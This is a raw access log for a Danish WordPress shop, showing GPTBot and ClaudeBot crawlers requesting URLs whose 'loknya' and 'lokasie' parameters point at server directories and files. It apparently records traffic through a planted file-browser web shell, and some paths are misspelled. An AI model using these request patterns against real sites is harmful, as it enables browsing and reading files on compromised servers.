74.7.227.174 - - [29/Jul/2026:08:37:35 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/./././././.cagefs/var/php/apm/db HTTP/2" 200 1826 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././.cagefs/var/php/apm" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:35 +0200] "GET /privatlivspolitik/?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2Fwp-admin%2Fjs%2Fwidgets%2Fmedia-image-widget.js&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2Fwp-admin%2Fjs%2Fwidgets HTTP/2" 200 3376 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:37:36 +0200] "GET /?loknya=/var/www/vhosts/stor-bors.dk/./lscach/9/c/ HTTP/2" 200 1787 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/9/c/e" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:36 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fe%2Fb%2Fd HTTP/2" 200 2047 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:37:36 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/./././././.cagefs/var/lib/php HTTP/2" 200 1951 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././.cagefs/var/lib" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:36 +0200] "GET /index.php/%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstor-ors.dk%2Flscach%2F4 HTTP/2" 200 1769 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:37:36 +0200] "GET /?loknya=/var/www/vhosts/store-bors.k/./lscache/8/a/ HTTP/2" 200 1783 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/8/a/d" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:36 +0200] "GET /privatlivspolitik/?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2Fwp-content%2Fuploads%2Fbackup%2Findex.php&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2Fwp-content%2Fuploads%2Fbackup HTTP/2" 200 1545 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:37:36 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes/block-patterns/query-medium-posts.php&loknya=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes/block-patterns HTTP/2" 200 2027 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes/block-patterns" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:36 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fc%2Fb%2F2 HTTP/2" 200 1983 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:37:37 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fd%2Fd%2Fd HTTP/2" 200 1988 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:37:37 +0200] "GET /?loknya=/vr/www/vhosts/stor-bors.dk/./lscch/9/ HTTP/2" 200 1769 "https://www.store-bors.dk/?loknya=/vr/www/vhosts/store-bors.dk/./lscche/9/e/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
